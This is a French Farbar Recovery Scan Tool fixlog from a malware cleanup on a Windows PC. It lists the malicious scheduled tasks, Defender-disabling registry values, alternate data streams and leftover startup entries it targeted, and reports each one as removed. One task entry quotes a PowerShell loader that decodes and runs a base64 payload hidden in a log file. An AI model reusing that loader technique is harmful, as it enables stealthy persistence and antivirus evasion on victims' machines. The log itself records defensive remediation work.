RÃ©sultats de correction de Farbar Recovery Scan Tool (x64) Version: 29-06-2022
ExÃ©cutÃ© par LEGION (29-06-2022 21:03:13) Run:1
ExÃ©cutÃ© depuis C:\Users\LEGION\Downloads\Programs
Profils chargÃ©s: LEGION
Mode d'amorÃ§age: Normal
==============================================

fixlist contenu:
*****************
Start::
CreateRestorePoint:
CloseProcesses:
Task: {6C290D84-5FF2-4896-8463-779804BF91F5} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a=Get-Content "C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction 
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction 
GroupPolicy: Restriction ? 
Policies: C:\ProgramData\NTUSER.pol: Restriction 
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction 
Task: {68063257-AFAD-4FD9-A54E-BFDF91840EE5} - System32\Tasks\Service\Diagnostic => C:\Users\LEGION\AppData\Roaming\ServiceGet\Nartez.exe -> "C:\Users\LEGION\AppData\Roaming\ServiceGet\Nartez.dat" 
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier)
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\...\Run: [OSDownloaderUpdate] => "D:\OSDownloader\OSDownloaderUpdate.exe" "sleep" (Pas de fichier)
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\...\Run: [OSDownloader] => "D:\OSDownloader\OSDownloader.exe" AutoStart (Pas de fichier)
Task: {1C8F25A7-9D74-4441-8028-7C3D8C4300B2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3210557229-2298905555-4232158819-1001Core => C:\Users\LEGION\AppData\Local\Google\Update\GoogleUpdate.exe /c (Pas de fichier)
Task: {BDCC6BEA-B78F-42F2-B595-BEEC4B3704AF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3210557229-2298905555-4232158819-1001UA => C:\Users\LEGION\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler (Pas de fichier)
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvÃ©(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvÃ©(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvÃ©(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvÃ©(e)]
CustomCLSID: HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{345D3165-3889-4694-AB75-A91A27B217E8}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe => Pas de fichier
CustomCLSID: HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{8B4929F8-076F-4AEC-AFEE-8928747B7AE3}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe /Automation => Pas de fichier
CustomCLSID: HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{AA46BA8A-9825-40FD-8493-0BA3C4D5CEB5}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe /Automation => Pas de fichier
AlternateDataStreams: C:\WINDOWS\system32\9EarsSurroundSound.dll:97D88723C8 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk:B96E9B8455 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth Pro.lnk:D4B8FFC6DE [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Safe Connect.lnk:25005D1B15 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk:60EC9648C0 [3314]
FirewallRules: [{FAC297E8-F9F6-4E52-B185-9EDF1850140A}] => (Allow) C:\Users\LEGION\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{568BDB65-9616-455B-9034-D1A3D61139E5}] => (Allow) C:\Users\LEGION\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
C:\Users\LEGION\AppData\Roaming\ServiceGet
EmptyTemp:
End:
*****************

Le Point de restauration a Ã©tÃ© crÃ©Ã© avec succÃ¨s.
Processus fermÃ© avec succÃ¨s.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{6C290D84-5FF2-4896-8463-779804BF91F5}" => supprimÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6C290D84-5FF2-4896-8463-779804BF91F5}" => supprimÃ©(es) avec succÃ¨s
C:\WINDOWS\System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => dÃ©placÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\NetService\Network\NetServices" => supprimÃ©(es) avec succÃ¨s
HKLM\SOFTWARE\Microsoft\Windows Defender\\"DisableAntiSpyware"="0" => valeur restaurÃ©(es) avec succÃ¨s
HKLM\SOFTWARE\Microsoft\Windows Defender\\"DisableAntiVirus"="0" => valeur restaurÃ©(es) avec succÃ¨s
C:\WINDOWS\system32\GroupPolicy\Machine => dÃ©placÃ©(es) avec succÃ¨s
C:\WINDOWS\system32\GroupPolicy\GPT.ini => dÃ©placÃ©(es) avec succÃ¨s
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => dÃ©placÃ©(es) avec succÃ¨s
C:\ProgramData\NTUSER.pol => dÃ©placÃ©(es) avec succÃ¨s
HKLM\SOFTWARE\Policies\Mozilla => supprimÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{68063257-AFAD-4FD9-A54E-BFDF91840EE5}" => supprimÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{68063257-AFAD-4FD9-A54E-BFDF91840EE5}" => supprimÃ©(es) avec succÃ¨s
C:\WINDOWS\System32\Tasks\Service\Diagnostic => dÃ©placÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Service\Diagnostic" => supprimÃ©(es) avec succÃ¨s
"HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Web Companion" => supprimÃ©(es) avec succÃ¨s
"HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\Software\Microsoft\Windows\CurrentVersion\Run\\OSDownloaderUpdate" => supprimÃ©(es) avec succÃ¨s
"HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\Software\Microsoft\Windows\CurrentVersion\Run\\OSDownloader" => supprimÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1C8F25A7-9D74-4441-8028-7C3D8C4300B2}" => supprimÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C8F25A7-9D74-4441-8028-7C3D8C4300B2}" => supprimÃ©(es) avec succÃ¨s
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3210557229-2298905555-4232158819-1001Core => dÃ©placÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-3210557229-2298905555-4232158819-1001Core" => supprimÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BDCC6BEA-B78F-42F2-B595-BEEC4B3704AF}" => supprimÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BDCC6BEA-B78F-42F2-B595-BEEC4B3704AF}" => supprimÃ©(es) avec succÃ¨s
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3210557229-2298905555-4232158819-1001UA => dÃ©placÃ©(es) avec succÃ¨s
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-3210557229-2298905555-4232158819-1001UA" => supprimÃ©(es) avec succÃ¨s
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => supprimÃ©(es) avec succÃ¨s
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8 => supprimÃ©(es) avec succÃ¨s
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => supprimÃ©(es) avec succÃ¨s
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => supprimÃ©(es) avec succÃ¨s
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{345D3165-3889-4694-AB75-A91A27B217E8} => supprimÃ©(es) avec succÃ¨s
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{8B4929F8-076F-4AEC-AFEE-8928747B7AE3} => supprimÃ©(es) avec succÃ¨s
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{AA46BA8A-9825-40FD-8493-0BA3C4D5CEB5} => supprimÃ©(es) avec succÃ¨s
C:\WINDOWS\system32\9EarsSurroundSound.dll => ":97D88723C8" ADS supprimÃ©(es) avec succÃ¨s
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini => ":B1DA6C571C" ADS supprimÃ©(es) avec succÃ¨s
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini => ":41964AA945" ADS supprimÃ©(es) avec succÃ¨s
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk => ":BE32D07BC5" ADS supprimÃ©(es) avec succÃ¨s
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk => ":B96E9B8455" ADS supprimÃ©(es) avec succÃ¨s
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth Pro.lnk => ":D4B8FFC6DE" ADS supprimÃ©(es) avec succÃ¨s
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Safe Connect.lnk => ":25005D1B15" ADS supprimÃ©(es) avec succÃ¨s
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk => ":60EC9648C0" ADS supprimÃ©(es) avec succÃ¨s
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FAC297E8-F9F6-4E52-B185-9EDF1850140A}" => supprimÃ©(es) avec succÃ¨s
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{568BDB65-9616-455B-9034-D1A3D61139E5}" => supprimÃ©(es) avec succÃ¨s
C:\Users\LEGION\AppData\Roaming\ServiceGet => dÃ©placÃ©(es) avec succÃ¨s

=========== EmptyTemp: ==========

BITS transfer queue => 1572864 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 61178692 B
Java, Discord, Steam htmlcache => 476218163 B
Windows/system/drivers => 11520374 B
Edge => 251111 B
Chrome => 1020315911 B
Firefox => 0 B
Opera => 286499971 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 212086 B
NetworkService => 325246 B
LEGION => 51744116 B

RecycleBin => 0 B
EmptyTemp: => 1.8 GB donnÃ©es temporaires supprimÃ©es.

================================


Le systÃ¨me a dÃ» redÃ©marrer.

==== Fin de Fixlog 21:04:17 ====